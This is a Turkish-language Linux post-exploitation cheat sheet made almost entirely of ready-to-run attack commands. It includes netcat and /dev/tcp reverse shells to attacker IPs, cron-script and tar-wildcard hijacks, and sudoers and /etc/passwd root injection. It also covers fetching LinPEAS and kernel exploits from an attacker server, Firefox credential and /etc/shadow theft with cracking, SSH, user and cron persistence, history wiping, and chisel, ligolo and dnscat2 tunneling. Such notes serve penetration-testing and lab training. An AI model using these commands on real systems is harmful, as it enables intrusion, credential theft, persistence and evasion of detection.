Linux Post Exploitation
KullanΔ±cΔ± ve Gruplar
id # KullanΔ±cΔ± ve grup
cat /etc/passwd # KullanΔ±cΔ±lar
env # Ortam DeΔiΕkenleri
cat .bashrc
Sistem Bilgileri
hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release
cat /etc/issue
dpkg -l # Uygulamalar
# Mount edilmiΕ dizinler
cat /etc/fstab
mount
# BΓΌtΓΌn diskler
lsblk
# ModΓΌl ve Driverlar
lsmod
/sbin/modinfo libata
grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama
Process Bilgileri
ps aux
AΔ Bilgileri
# AΔ ArayΓΌzleri
ip a
ifconfig a
# Açık Portlar
netstat -punta
ss -ntpul
# YΓΆnlendirme Tablosu
route
cat /etc/networks
ip route
# Firewall AyarlarΔ±
cat /etc/iptables/rules.v4
# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"
cat /etc/hosts # Hosts dosyasΔ±
cat /etc/resolv.conf # DNS dosyasΔ±
CronJobs
ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # KullanΔ±cΔ±nΔ±n Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem LoglarΔ±nda Cronjob Arama
# BΓΌtΓΌn Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh
# Root Shell Exploit
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/john/backup.sh
/tmp/bash -ip
# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh
World Writable Dosyalar
find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null
# EΔer /etc/passwd var ise root kullanΔ±cΔ± ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
SUID Binary
find / -perm -4000 2>/dev/null
# AΕaΔΔ±daki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount
# Veya SUID ile iΕaretlenmiΕ bir dosya bizim deΔiΕtirebildiΔimiz bir dosyayΔ± kullanΔ±yorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan DosyanΔ±n ΓaΔΔ±rdΔ±ΔΔ± Dosya
cp /bin/bash > backup.config
./backup.sh
SUDO
Bu komutlar ile hangi dosyalarΔ± sudo komutu ile Γ§alΔ±ΕtΔ±rabileceΔimizi gΓΆrebiliriz.
sudo -l
# NOPASSWD:ALL ROOT olan bir sh dosyasΔ± varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash
Binary Capabilities
GTFOBins: https://gtfobins.github.io/
/usr/sbin/getcap -r / 2>/dev/null
Wildcard Exploit
EΔer bir cronjob'da * karakteri varsa aΕaΔΔ±daki exploit uygulanabilir.
echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
grep "echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip
Automated
# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80
# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check
chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check
./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt
Reverse Shell
# Basit Listener
nc -lvnp 9001
# Otomatik Listener
pwncat-cs -p 9001
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.2 9001 >/tmp/f
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.2/9001 0>&1'
echo "<BASE64_REV>"|base64${IFS}-d|bash
Shell Upgrade
# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
# Python yoksa
script /dev/null -qc /bin/bash
# SonrasΔ±nda
CTRL + Z
stty size # Buradaki deΔeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;
Firefox Creds
Decrypter: https://github.com/unode/firefox_decrypt
cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json
Dosya Transferi
# Local
python3 -m http.server 80
updog 80
# Hedef
cd /tmp
wget http://192.168.1.3/LinEnum.sh
# Netcat ile
nc -lvnp 1234 > file.txt
nc -w 3 192.168.1.3 1234 < file.txt
Kernel Exploit
cat /etc/issue
uname -r
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80
wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
SSH Persistence
# EΔer id_rsa yoksa
ssh-keygen
scp root@192.168.1.3:~/.ssh/id_rsa .
chmod 600 id_rsa
ssh root@192.168.1.3 -i id_rsa
ssh-keygen # Kali de ssh key olustur
cat /root/.ssh/id_rsa.pub
echo 'xxxxxxxxxxxxxx'>/root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
User Persistence
useradd -m -s /bin/bash hacker
usermod -aG sudo hacker
passwd hacker
ssh hacker@192.168.1.3
Cron Persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<IP>/1234 0>&1'" > cron
crontab -i cron
crontab -l
Hash Dumping
EΔer hedef makinede root kullanΔ±cΔ± isek aΕaΔΔ±daki komut ile bΓΌtΓΌn kullanΔ±cΔ±larΔ±n hash deΔerlerini gΓΆrebiliriz.
cat /etc/shadow
john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
ssh2john id_rsa > ssh.hash
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
History Silme
history -c
cat /dev/null > ~/.bash_history
Port Forwarding
# AynΔ± aΔdaki 22 portu aΓ§Δ±k olan servisi kendi portuna yΓΆnlendirir
socat -ddd TCP-LISTEN:2222,fork TCP:192.168.1.4:22
ssh 192.168.1.3 -p 2222
SSH Tunneling
# Local port forwarding
ssh -N -L 0.0.0.0:2222:172.16.1.4:22 root@192.168.1.3
ssh root@192.168.1.3 -p 2222
# Dynamic Port Forwarding
ssh -N -D 0.0.0.0:9999 root@192.168.1.3
mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999
proxychains nmap -v -sT -Pn 172.168.1.3
# Remote Port Forward
systemctl start ssh
ssh -N -R 127.0.0.1:2222:10.4.50.215:22 root@192.168.1.2
ssh 127.0.0.1 -p 2222
# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999
proxychains nmap -v -sT -Pn -n 172.168.1.3
# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24
HTTP Tunneling
# https://github.com/jpillora/chisel/releases
python -m http.server 80
chisel server --port 8081 --reverse
wget http://192.168.1.2/chisel -O /tmp/chisel && chmod +x /tmp/chisel
/tmp/chisel client 192.168.1.3:8081 R:socks &> /tmp/output
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 1080
# Ligolo
./proxy -selfcert -laddr 0.0.0.0:443
./agent -ignore-cert -connect 192.168.1.2:443
DNS Tunneling
mousepad dnsmasq.conf
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts
# Define the zone
auth-zone=feline.corp
auth-server=feline.corp
# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.
dnsmasq -C dnsmasq.conf -d
# Local
dnscat2-server feline.corp
cp /usr/bin/dnscat .
python -m http.server 80
# Hedef
wget http://192.168.1.2/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat
/tmp/dnscat feline.corp
window -i 1
listen 0.0.0.0:4455 172.16.2.4:445
Last updated